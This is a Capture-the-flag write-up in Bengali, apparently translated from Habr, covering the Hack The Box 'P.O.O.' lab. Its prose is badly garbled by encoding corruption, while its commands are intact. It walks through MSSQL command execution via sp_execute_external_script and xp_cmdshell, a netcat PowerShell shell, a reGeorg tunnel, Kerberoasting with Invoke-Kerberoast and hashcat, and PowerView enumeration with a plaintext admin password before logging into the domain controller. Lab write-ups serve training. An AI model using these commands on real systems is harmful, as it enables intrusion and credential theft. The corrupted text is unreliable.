āĻāĻŦāĻ āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻ¨āĻ¤ā§āĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°āĻŋ, āĻ¨āĻ¤ā§āĻ¨ āĻĒāĻ¤āĻžāĻāĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĒāĻ°ā§āĻ¯āĻŦā§āĻā§āĻˇāĻŖ āĻāĻ°āĻŋāĨ¤
āĻāĻŽāĻ°āĻž āĻāĻ āĻĒāĻ¤āĻžāĻāĻž āĻšāĻ¸ā§āĻ¤āĻžāĻ¨ā§āĻ¤āĻ° āĻāĻ°āĻŋ āĻāĻŦāĻ āĻāĻ°āĻ āĻāĻāĻŋāĻ¯āĻŧā§ āĻ¯āĻžāĻāĨ¤
āĻŦā§āĻ¯āĻžāĻāĻā§āĻ°ā§āĻ¯āĻžāĻ āĻĒāĻ¤āĻžāĻāĻž
āĻāĻ¸ā§āĻ¨ MSSQL āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻļā§āĻ˛āĻāĻŋ āĻĒāĻžāĻ¨, āĻāĻŽāĻŋ āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻĒā§āĻ¯āĻžāĻā§āĻ āĻĨā§āĻā§ mssqlclient āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻāĻŋāĨ¤
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
āĻāĻŽāĻžāĻĻā§āĻ° āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻĒā§āĻ¤ā§ āĻšāĻŦā§, āĻāĻŦāĻ āĻĒā§āĻ°āĻĨāĻŽ āĻāĻŋāĻ¨āĻŋāĻ¸ āĻ¯āĻž āĻāĻŽāĻ°āĻž āĻāĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§ āĻĒā§āĻ°āĻŖ āĻāĻ°ā§āĻāĻŋ āĻ¤āĻž āĻšāĻ˛ āĻ¸āĻžāĻāĻāĨ¤ āĻ¸ā§āĻ¤āĻ°āĻžāĻ, āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻāĻāĻŋ āĻāĻ¯āĻŧā§āĻŦ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ° āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨ (āĻāĻāĻāĻŋ āĻ¸ā§āĻŦāĻŋāĻ§āĻžāĻāĻ¨āĻ āĻļā§āĻ˛ āĻ¨āĻŋāĻā§āĻˇā§āĻĒ āĻāĻ°āĻž āĻ
āĻ¸āĻŽā§āĻāĻŦ, āĻĻā§āĻļā§āĻ¯āĻ¤ āĻĢāĻžāĻ¯āĻŧāĻžāĻ°āĻāĻ¯āĻŧāĻžāĻ˛ āĻāĻžāĻ āĻāĻ°āĻā§)āĨ¤
āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻĒā§āĻ°āĻŦā§āĻļāĻžāĻ§āĻŋāĻāĻžāĻ° āĻ
āĻ¸ā§āĻŦā§āĻāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻ¯āĻĻāĻŋāĻ āĻāĻŽāĻ°āĻž MSSQL āĻĨā§āĻā§ āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻĒāĻĄāĻŧāĻ¤ā§ āĻĒāĻžāĻ°āĻŋ, āĻ¤āĻŦā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻļā§āĻ§ā§ āĻāĻžāĻ¨āĻ¤ā§ āĻšāĻŦā§ āĻā§āĻ¨ āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽāĻŋāĻ āĻ˛ā§āĻ¯āĻžāĻā§āĻā§āĻ¯āĻŧā§āĻāĻā§āĻ˛ā§ āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ° āĻāĻ°āĻž āĻāĻā§āĨ¤ āĻāĻŦāĻ MSSQL āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ¤ā§ āĻāĻŽāĻ°āĻž āĻā§āĻāĻā§ āĻĒāĻžāĻ āĻ¯ā§ āĻĒāĻžāĻāĻĨāĻ¨ āĻāĻā§āĨ¤
āĻ¤āĻžāĻšāĻ˛ā§ web.config āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻĒāĻĄāĻŧāĻ¤ā§ āĻā§āĻ¨ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž āĻ¨ā§āĻāĨ¤
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻā§āĻ˛ā§, /admin-āĻ āĻ¯āĻžāĻ¨ āĻāĻŦāĻ āĻĒāĻ¤āĻžāĻāĻžāĻāĻŋ āĻ¤ā§āĻ˛ā§ āĻ¨āĻŋāĻ¨āĨ¤
āĻĒāĻžāĻĻāĻĻā§āĻļ āĻĒāĻ¤āĻžāĻāĻž
āĻāĻ¸āĻ˛ā§, āĻĢāĻžāĻ¯āĻŧāĻžāĻ°āĻāĻ¯āĻŧāĻžāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĻ° āĻāĻŋāĻā§ āĻ āĻ¸ā§āĻŦāĻŋāĻ§āĻž āĻāĻā§, āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻ¸ā§āĻāĻŋāĻāĻ¸ āĻĻā§āĻā§ āĻāĻŽāĻ°āĻž āĻ˛āĻā§āĻˇā§āĻ¯ āĻāĻ°āĻŋ āĻ¯ā§ IPv6 āĻĒā§āĻ°ā§āĻā§āĻāĻ˛āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§!
āĻāĻ āĻ āĻŋāĻāĻžāĻ¨āĻžāĻāĻŋ /etc/hosts āĻ āĻ¯ā§āĻ āĻāĻ°ā§āĻ¨āĨ¤
dead:babe::1001 poo6.htb
āĻāĻŦāĻžāĻ° āĻšā§āĻ¸ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°āĻž āĻ¯āĻžāĻ, āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻāĻŦāĻžāĻ° IPv6 āĻāĻ° āĻāĻĒāĻ°ā§āĨ¤
āĻāĻŦāĻ WinRM āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž IPv6 āĻ¤ā§ āĻāĻĒāĻ˛āĻŦā§āĻ§āĨ¤ āĻāĻ° āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°āĻž āĻ¯āĻžāĻ.
āĻĄā§āĻ¸ā§āĻāĻāĻĒā§ āĻāĻāĻāĻž āĻĒāĻ¤āĻžāĻāĻž āĻāĻā§, āĻšāĻžāĻ¤ā§ āĻĻāĻžāĻāĨ¤
P00ned āĻĒāĻ¤āĻžāĻāĻž
āĻ¸āĻā§āĻā§ āĻšā§āĻ¸ā§āĻ āĻāĻĒāĻ° reconnaissance āĻĒāĻ°ā§
setspn.exe -T intranet.poo -Q */*
āĻāĻ¸ā§āĻ¨ MSSQL āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻŋāĨ¤
āĻāĻāĻāĻžāĻŦā§, āĻāĻŽāĻ°āĻž p00_hr āĻāĻŦāĻ p00_adm āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻĻā§āĻ° SPN āĻĒāĻžāĻ, āĻ¯āĻžāĻ° āĻŽāĻžāĻ¨ā§ āĻšāĻ˛ āĻ¤āĻžāĻ°āĻž Kerberoasting-āĻāĻ° āĻŽāĻ¤ā§ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻāĻ¨ā§āĻ¯ āĻā§āĻāĻāĻŋāĻĒā§āĻ°ā§āĻŖāĨ¤ āĻ¸āĻāĻā§āĻˇā§āĻĒā§, āĻāĻŽāĻ°āĻž āĻ¤āĻžāĻĻā§āĻ° āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄā§āĻ° āĻšā§āĻ¯āĻžāĻļ āĻĒā§āĻ¤ā§ āĻĒāĻžāĻ°āĻŋāĨ¤
āĻĒā§āĻ°āĻĨāĻŽā§ āĻāĻĒāĻ¨āĻžāĻā§ MSSQL āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻĒāĻā§āĻˇā§ āĻāĻāĻāĻŋ āĻ¸ā§āĻĨāĻŋāĻ¤āĻŋāĻļā§āĻ˛ āĻļā§āĻ˛ āĻĒā§āĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ¯ā§āĻšā§āĻ¤ā§ āĻāĻŽāĻ°āĻž āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ā§ āĻ¸ā§āĻŽāĻŋāĻ¤, āĻ¤āĻžāĻ āĻĒā§āĻ°ā§āĻ 80 āĻāĻŦāĻ 1433 āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻšā§āĻ¸ā§āĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¸āĻāĻ¯ā§āĻ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻŋāĻ¨ā§āĻ¤ā§ 80 āĻŦāĻ¨ā§āĻĻāĻ° āĻĻāĻŋāĻ¯āĻŧā§ āĻā§āĻ°āĻžāĻĢāĻŋāĻ āĻāĻžāĻ¨ā§āĻ˛ āĻāĻ°āĻž āĻ¸āĻŽā§āĻāĻŦ! āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻŽāĻ°āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŋ
āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ¯āĻāĻ¨ āĻāĻŽāĻ°āĻž āĻāĻāĻŋ āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻāĻ°āĻžāĻ° āĻā§āĻˇā§āĻāĻž āĻāĻ°āĻŋ, āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ 404 āĻ¤ā§āĻ°ā§āĻāĻŋ āĻĒāĻžāĻāĨ¤āĻāĻ° āĻŽāĻžāĻ¨ā§ āĻšāĻ˛ āĻ¯ā§ *.aspx āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻšāĻ¯āĻŧ āĻ¨āĻžāĨ¤ āĻāĻ āĻāĻā§āĻ¸āĻā§āĻ¨āĻļāĻ¨āĻā§āĻ˛āĻŋāĻ° āĻ¸āĻžāĻĨā§ āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯, āĻ¨āĻŋāĻŽā§āĻ¨āĻ°ā§āĻĒ ASP.NET 4.5 āĻāĻ¨āĻ¸ā§āĻāĻ˛ āĻāĻ°ā§āĻ¨āĨ¤
dism /online /enable-feature /all /featurename:IIS-ASPNET45
āĻāĻŦāĻ āĻāĻāĻ¨, tunnel.aspx āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻāĻ°āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ, āĻāĻŽāĻ°āĻž āĻāĻ¤ā§āĻ¤āĻ° āĻĒāĻžāĻ āĻ¯ā§ āĻ¸āĻŦāĻāĻŋāĻā§ āĻ¯ā§āĻ¤ā§ āĻĒā§āĻ°āĻ¸ā§āĻ¤ā§āĻ¤āĨ¤
āĻāĻ¸ā§āĻ¨ āĻ
ā§āĻ¯āĻžāĻĒā§āĻ˛āĻŋāĻā§āĻļāĻ¨āĻāĻŋāĻ° āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻ āĻ
āĻāĻļāĻāĻŋ āĻļā§āĻ°ā§ āĻāĻ°āĻŋ, āĻ¯āĻž āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻ āĻ°āĻŋāĻ˛ā§ āĻāĻ°āĻŦā§āĨ¤ āĻāĻŽāĻ°āĻž āĻĒā§āĻ°ā§āĻ 5432 āĻĨā§āĻā§ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻ āĻĢāĻ°ā§āĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻāĻ°āĻŦāĨ¤
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻĒā§āĻ°āĻā§āĻ¸āĻŋāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ¯ā§āĻā§āĻ¨ā§ āĻ
ā§āĻ¯āĻžāĻĒā§āĻ˛āĻŋāĻā§āĻļāĻ¨ā§āĻ° āĻā§āĻ°āĻžāĻĢāĻŋāĻ āĻĒāĻžāĻ āĻžāĻ¤ā§ āĻĒā§āĻ°āĻā§āĻ¸āĻŋāĻā§āĻāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŋāĨ¤ āĻāĻ¸ā§āĻ¨ āĻāĻ āĻĒā§āĻ°āĻā§āĻ¸āĻŋāĻāĻŋāĻā§ /etc/proxychains.conf āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ°ā§āĻļāĻ¨ āĻĢāĻžāĻāĻ˛ā§ āĻ¯ā§āĻ āĻāĻ°āĻŋāĨ¤
āĻāĻāĻ¨ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§ āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽ āĻāĻĒāĻ˛ā§āĻĄ āĻāĻ°āĻž āĻ¯āĻžāĻ
āĻāĻāĻ¨, MSSQL āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§, āĻāĻŽāĻ°āĻž āĻ˛āĻŋāĻ¸ā§āĻ¨āĻžāĻ° āĻāĻžāĻ˛ā§ āĻāĻ°āĻŋāĨ¤
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻĒā§āĻ°āĻā§āĻ¸āĻŋāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°āĻŋāĨ¤
proxychains rlwrap nc poo.htb 4321
āĻāĻŦāĻ āĻāĻ° āĻšā§āĻ¯āĻžāĻļ āĻĒā§āĻ¤ā§.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
āĻāĻ° āĻĒāĻ°ā§, āĻāĻĒāĻ¨āĻžāĻā§ āĻāĻ āĻšā§āĻ¯āĻžāĻļāĻā§āĻ˛āĻŋāĻ° āĻāĻĒāĻ° āĻĒā§āĻ¨āĻ°āĻžāĻŦā§āĻ¤ā§āĻ¤āĻŋ āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻ¯ā§āĻšā§āĻ¤ā§ rockyou āĻāĻ° āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻĄā§āĻāĻž āĻ
āĻāĻŋāĻ§āĻžāĻ¨ āĻ¨ā§āĻ, āĻ¤āĻžāĻ āĻāĻŽāĻŋ Seclists-āĻ āĻĻā§āĻāĻ¯āĻŧāĻž āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻ
āĻāĻŋāĻ§āĻžāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋāĨ¤ āĻāĻŖāĻ¨āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻŽāĻ°āĻž āĻšā§āĻ¯āĻžāĻļāĻā§āĻ¯āĻžāĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŋāĨ¤
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻāĻāĻ¯āĻŧ āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄāĻ āĻĒāĻžāĻ, āĻĒā§āĻ°āĻĨāĻŽāĻāĻŋ dutch_passwordlist.txt āĻ āĻāĻŋāĻ§āĻžāĻ¨ā§ āĻāĻŦāĻ āĻĻā§āĻŦāĻŋāĻ¤ā§āĻ¯āĻŧāĻāĻŋ Keyboard-Combinations.txt-āĻāĨ¤
āĻāĻŦāĻ āĻ¤āĻžāĻ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¤āĻŋāĻ¨āĻāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻāĻā§, āĻāĻŽāĻ°āĻž āĻĄā§āĻŽā§āĻāĻ¨ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ°ā§ āĻ¯āĻžāĻāĨ¤ āĻāĻā§ āĻ¤āĻžāĻ° āĻ āĻŋāĻāĻžāĻ¨āĻž āĻā§āĻ¨ā§ āĻ¨ā§āĻāĻ¯āĻŧāĻž āĻ¯āĻžāĻāĨ¤
āĻĻāĻžāĻ°ā§āĻŖ, āĻāĻŽāĻ°āĻž āĻĄā§āĻŽā§āĻāĻ¨ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ°ā§āĻ° āĻāĻāĻĒāĻŋ āĻ āĻŋāĻāĻžāĻ¨āĻž āĻļāĻŋāĻā§āĻāĻŋāĨ¤ āĻāĻ¸ā§āĻ¨ āĻĄā§āĻŽā§āĻ¨ā§āĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻā§āĻāĻā§ āĻŦā§āĻ° āĻāĻ°āĻŋ, āĻ¸ā§āĻāĻ¸āĻžāĻĨā§ āĻ¤āĻžāĻĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻā§ āĻāĻāĻāĻ¨ āĻĒā§āĻ°āĻļāĻžāĻ¸āĻāĨ¤ āĻ¤āĻĨā§āĻ¯ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°āĻ¤ā§ PowerView.ps1. āĻ¤āĻžāĻ°āĻĒāĻ°ā§ āĻāĻŽāĻ°āĻž -s āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ°ā§ āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻ¸āĻš āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻ°ā§, evil-winrm āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°āĻŦāĨ¤ āĻāĻŦāĻ āĻ¤āĻžāĻ°āĻĒāĻ° āĻļā§āĻ§ā§ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ°āĻāĻŋāĻ āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻ˛ā§āĻĄ āĻāĻ°ā§āĻ¨āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻāĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĢāĻžāĻāĻļāĻ¨ āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻāĻ°āĻ¤ā§ āĻĒā§āĻ°ā§āĻāĻŋāĨ¤ p00_adm āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻĻā§āĻāĻ¤ā§ āĻāĻāĻāĻŋ āĻŦāĻŋāĻļā§āĻˇ āĻ¸ā§āĻŦāĻŋāĻ§āĻžāĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻŽāĻ¤ā§, āĻ¤āĻžāĻ āĻāĻŽāĻ°āĻž āĻāĻ° āĻĒā§āĻ°āĻ¸āĻā§āĻā§ āĻāĻžāĻ āĻāĻ°āĻŦāĨ¤ āĻāĻ¸ā§āĻ¨ āĻāĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ PSC Credential āĻ
āĻŦāĻā§āĻā§āĻ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻŋāĨ¤
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
āĻāĻāĻ¨ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ°āĻļā§āĻ˛ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ¯ā§āĻāĻžāĻ¨ā§ āĻāĻŽāĻ°āĻž āĻā§āĻ°ā§āĻĄāĻ¸ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻ°āĻŋ āĻ¸ā§āĻā§āĻ˛āĻŋ p00_adm-āĻāĻ° āĻĒāĻā§āĻˇ āĻĨā§āĻā§ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻž āĻšāĻŦā§āĨ¤ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻĻā§āĻ° āĻāĻāĻāĻŋ āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻāĻŦāĻ AdminCount āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ āĻĒā§āĻ°āĻĻāĻ°ā§āĻļāĻ¨ āĻāĻ°āĻž āĻ¯āĻžāĻāĨ¤
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
āĻāĻŦāĻ āĻ¤āĻžāĻ, āĻāĻŽāĻžāĻĻā§āĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻ¸āĻ¤ā§āĻ¯āĻŋāĻ āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ°āĻĒā§āĻ°āĻžāĻĒā§āĻ¤. āĻĻā§āĻāĻž āĻ¯āĻžāĻ āĻ¸ā§ āĻā§āĻ¨ āĻĻāĻ˛ā§āĻ° āĻ¸āĻĻāĻ¸ā§āĻ¯āĨ¤
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
āĻāĻŽāĻ°āĻž āĻ
āĻŦāĻļā§āĻˇā§ āĻ¨āĻŋāĻļā§āĻāĻŋāĻ¤ āĻāĻ°āĻŋ āĻ¯ā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§ āĻāĻāĻāĻ¨ āĻĄā§āĻŽā§āĻ¨ āĻĒā§āĻ°āĻļāĻžāĻ¸āĻāĨ¤ āĻāĻāĻŋ āĻāĻāĻŋāĻā§ āĻĄā§āĻŽā§āĻ¨ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ°ā§ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§āĻāĻžāĻŦā§ āĻ˛āĻ āĻāĻ¨ āĻāĻ°āĻžāĻ° āĻ
āĻ§āĻŋāĻāĻžāĻ° āĻĻā§āĻ¯āĻŧā§ˇ āĻāĻ¸ā§āĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ¨ā§āĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ WinRM āĻĻāĻŋāĻ¯āĻŧā§ āĻ˛āĻāĻāĻ¨ āĻāĻ°āĻžāĻ° āĻā§āĻˇā§āĻāĻž āĻāĻ°āĻŋāĨ¤ āĻāĻŽāĻŋ āĻāĻžāĻ°āĻžāĻĒ-āĻāĻāĻ¨āĻāĻ°āĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ reGeorg āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻžāĻ°āĻŋ āĻāĻ°āĻž āĻ¤ā§āĻ°ā§āĻāĻŋāĻā§āĻ˛āĻŋ āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦāĻŋāĻā§āĻ°āĻžāĻ¨ā§āĻ¤ āĻšāĻ¯āĻŧā§ āĻĒāĻĄāĻŧā§āĻāĻŋāĻ˛āĻžāĻŽā§ˇ
āĻ¤āĻžāĻ°āĻĒāĻ°ā§ āĻāĻŽāĻ°āĻž āĻāĻ°ā§āĻāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŋ, āĻ¸āĻšāĻ,
āĻāĻŽāĻ°āĻž āĻ¸āĻāĻ¯ā§āĻ āĻāĻ°āĻžāĻ° āĻā§āĻˇā§āĻāĻž āĻāĻ°āĻŋ, āĻāĻŦāĻ āĻāĻŽāĻ°āĻž āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽā§ āĻāĻāĻŋāĨ¤
āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻĒāĻ¤āĻžāĻāĻž āĻ¨ā§āĻāĨ¤ āĻ¤āĻžāĻ°āĻĒāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻĻāĻŋāĻā§ āĻ¤āĻžāĻāĻžāĻ¨ āĻāĻŦāĻ āĻĄā§āĻ¸ā§āĻāĻāĻĒāĻā§āĻ˛āĻŋ āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°ā§āĻ¨āĨ¤
mr3ks āĻ āĻāĻŽāĻ°āĻž āĻĒāĻ¤āĻžāĻāĻž āĻā§āĻāĻā§ āĻĒāĻžāĻ āĻāĻŦāĻ āĻĒāĻ°ā§āĻā§āĻˇāĻžāĻāĻžāĻ°āĻāĻŋ 100% āĻ¸āĻŽā§āĻĒāĻ¨ā§āĻ¨ āĻšāĻ¯āĻŧā§āĻā§āĨ¤
āĻāĻāĻžāĻ¨ā§āĻ āĻļā§āĻˇ. āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻšāĻŋāĻ¸āĻžāĻŦā§, āĻāĻĒāĻ¨āĻŋ āĻāĻ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻāĻŋ āĻĨā§āĻā§ āĻ¨āĻ¤ā§āĻ¨ āĻāĻŋāĻā§ āĻļāĻŋāĻā§āĻā§āĻ¨ āĻāĻŋāĻ¨āĻž āĻāĻŦāĻ āĻāĻāĻŋ āĻāĻĒāĻ¨āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĻāĻ°āĻāĻžāĻ°ā§ āĻāĻŋāĻ¨āĻž āĻ¤āĻž āĻŽāĻ¨ā§āĻ¤āĻŦā§āĻ¯ āĻāĻ°ā§āĻ¨āĨ¤
āĻāĻĒāĻ¨āĻŋ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¯ā§āĻ āĻĻāĻŋāĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨
āĻāĻ¤ā§āĻ¸: www.habr.com